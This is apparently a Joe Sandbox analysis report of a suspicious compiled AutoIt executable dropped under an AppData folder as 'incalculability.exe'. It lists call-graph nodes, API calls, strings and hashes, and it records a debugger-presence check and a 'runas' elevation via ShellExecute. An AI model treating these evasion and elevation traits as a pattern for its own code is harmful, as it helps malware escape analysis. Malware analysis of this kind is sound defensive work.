41e27d 85410->85413 85453 417f77 46 API calls __getptd_noexit 85412->85453 85438 41e17f 85413->85438 85416 41e215 __wsopen_helper 85416->85356 85417 41e289 85455 41e2c0 LeaveCriticalSection __unlock_fhandle 85417->85455 85418 41e296 85454 417f8a 46 API calls __getptd_noexit 85418->85454 85421->85356 85422->85372 85423->85382 85424->85382 85425->85384 85426->85393 85427->85395 85429 41ae62 __wsopen_helper 85428->85429 85430 41aebc 85429->85430 85431 4182cb __lock 46 API calls 85429->85431 85432 41aec1 EnterCriticalSection 85430->85432 85434 41aede __wsopen_helper 85430->85434 85433 41ae8e 85431->85433 85432->85434 85435 41aeaa 85433->85435 85436 41ae97 InitializeCriticalSectionAndSpinCount 85433->85436 85434->85410 85437 41aeec ___lock_fhandle LeaveCriticalSection 85435->85437 85436->85435 85437->85430 85439 41aded __close_nolock 46 API calls 85438->85439 85440 41e18e 85439->85440 85441 41e1a4 SetFilePointer 85440->85441 85442 41e194 85440->85442 85444 41e1c3 85441->85444 85445 41e1bb GetLastError 85441->85445 85443 417f77 __mbschr_l 46 API calls 85442->85443 85446 41e199 85443->85446 85444->85446 85447 417f9d __dosmaperr 46 API calls 85444->85447 85445->85444 85446->85417 85447->85446 85448->85403 85449->85416 85450->85404 85451->85409 85452->85416 85453->85418 85454->85417 85455->85416 85457 4149ea 85456->85457 85458 4149fe 85456->85458 85502 417f77 46 API calls __getptd_noexit 85457->85502 85461 4149fa 85458->85461 85462 41443c __flush 77 API calls 85458->85462 85460 4149ef 85503 417f25 10 API calls __mbschr_l 85460->85503 85474 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 85461->85474 85464 414a0a 85462->85464 85475 41d8c2 85464->85475 85467 414139 __flush 46 API calls 85468 414a18 85467->85468 85479 41d7fe 85468->85479 85470 414a1e 85470->85461 85471 413748 _free 46 API calls 85470->85471 85471->85461 85472->85206 85473->85211 85474->85211 85476 41d8d2 85475->85476 85478 414a12 85475->85478 85477 413748 _free 46 API calls 85476->85477 85476->85478 
85477->85478 85478->85467 85480 41d80a __wsopen_helper 85479->85480 85481 41d812 85480->85481 85482 41d82d 85480->85482 85519 417f8a 46 API calls __getptd_noexit 85481->85519 85484 41d839 85482->85484 85489 41d873 85482->85489 85521 417f8a 46 API calls __getptd_noexit 85484->85521 85485 41d817 85520 417f77 46 API calls __getptd_noexit 85485->85520 85488 41d83e 85522 417f77 46 API calls __getptd_noexit 85488->85522 85490 41ae56 ___lock_fhandle 48 API calls 85489->85490 85492 41d879 85490->85492 85494 41d893 85492->85494 85495 41d887 85492->85495 85493 41d846 85523 417f25 10 API calls __mbschr_l 85493->85523 85524 417f77 46 API calls __getptd_noexit 85494->85524 85504 41d762 85495->85504 85499 41d88d 85525 41d8ba LeaveCriticalSection __unlock_fhandle 85499->85525 85501 41d81f __wsopen_helper 85501->85470 85502->85460 85503->85461 85526 41aded 85504->85526 85506 41d772 85507 41d7c8 85506->85507 85509 41d7a6 85506->85509 85510 41aded __close_nolock 46 API calls 85506->85510 85539 41ad67 47 API calls 2 library calls 85507->85539 85509->85507 85511 41aded __close_nolock 46 API calls 85509->85511 85513 41d79d 85510->85513 85514 41d7b2 CloseHandle 85511->85514 85512 41d7d0 85515 41d7f2 85512->85515 85540 417f9d 46 API calls 3 library calls 85512->85540 85516 41aded __close_nolock 46 API calls 85513->85516 85514->85507 85517 41d7be GetLastError 85514->85517 85515->85499 85516->85509 85517->85507 85519->85485 85520->85501 85521->85488 85522->85493 85523->85501 85524->85499 85525->85501 85527 41ae12 85526->85527 85528 41adfa 85526->85528 85531 417f8a __set_osfhnd 46 API calls 85527->85531 85534 41ae51 85527->85534 85529 417f8a __set_osfhnd 46 API calls 85528->85529 85530 41adff 85529->85530 85532 417f77 __mbschr_l 46 API calls 85530->85532 85533 41ae23 85531->85533 85535 41ae07 85532->85535 85536 417f77 __mbschr_l 46 API calls 85533->85536 85534->85506 85535->85506 85537 41ae2b 85536->85537 85538 417f25 __mbschr_l 10 API calls 85537->85538 85538->85535 85539->85512 
                            APIs
                            • _wcslen.LIBCMT ref: 004096C1
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _memmove.LIBCMT ref: 0040970C
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                            • _memmove.LIBCMT ref: 00409D96
                            • _memmove.LIBCMT ref: 0040A6C4
                            • _memmove.LIBCMT ref: 004297E5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                            • String ID:
                            • API String ID: 2383988440-0
                            • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                            • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                            • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                            • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                              • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                              • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                            • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                              • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                            • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                              • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                              • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                              • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                              • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                              • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                              • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                              • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                              • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                            • String ID: C:\Users\user\AppData\Local\inhumate\incalculability.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                            • API String ID: 2495805114-444942770
                            • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                            • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                            • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                            • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                            Control-flow Graph

                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 0040E52A
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                            • FreeLibrary.KERNEL32(?), ref: 0040E642
                            • FreeLibrary.KERNEL32(?), ref: 0040E654
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                            • String ID: 0SH
                            • API String ID: 3363477735-851180471
                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                            APIs
                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsThemeActive$uxtheme.dll
                            • API String ID: 2574300362-3542929980
                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchSleepTranslate
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                            • API String ID: 1762048999-758534266
                            • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                            • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                            Control-flow Graph

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • __wcsicoll.LIBCMT ref: 00402007
                            • __wcsicoll.LIBCMT ref: 0040201D
                            • __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                            • __wcsicoll.LIBCMT ref: 00402049
                            • _wcscpy.LIBCMT ref: 0040207C
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104), ref: 00428B5B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\inhumate\incalculability.exe$CMDLINE$CMDLINERAW
                            • API String ID: 3948761352-2181804678
                            • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                            • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_fseek_wcscpy
                            • String ID: D)E$D)E$FILE
                            • API String ID: 3888824918-361185794
                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                            • __wsplitpath.LIBCMT ref: 0040E41C
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcsncat.LIBCMT ref: 0040E433
                            • __wmakepath.LIBCMT ref: 0040E44F
                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • _wcscpy.LIBCMT ref: 0040E487
                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • _wcscat.LIBCMT ref: 00427541
                            • _wcslen.LIBCMT ref: 00427551
                            • _wcslen.LIBCMT ref: 00427562
                            • _wcscat.LIBCMT ref: 0042757C
                            • _wcsncpy.LIBCMT ref: 004275BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                            • String ID: Include$\
                            • API String ID: 3173733714-3429789819
                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                            Control-flow Graph

                            APIs
                            • _fseek.LIBCMT ref: 0045292B
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452961
                            • __fread_nolock.LIBCMT ref: 00452971
                            • __fread_nolock.LIBCMT ref: 0045298A
                            • __fread_nolock.LIBCMT ref: 004529A5
                            • _fseek.LIBCMT ref: 004529BF
                            • _malloc.LIBCMT ref: 004529CA
                            • _malloc.LIBCMT ref: 004529D6
                            • __fread_nolock.LIBCMT ref: 004529E7
                            • _free.LIBCMT ref: 00452A17
                            • _free.LIBCMT ref: 00452A20
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                            • String ID:
                            • API String ID: 1255752989-0
                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                            • ImageList_ReplaceIcon.COMCTL32(009099B8,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                            • RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009099B8,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
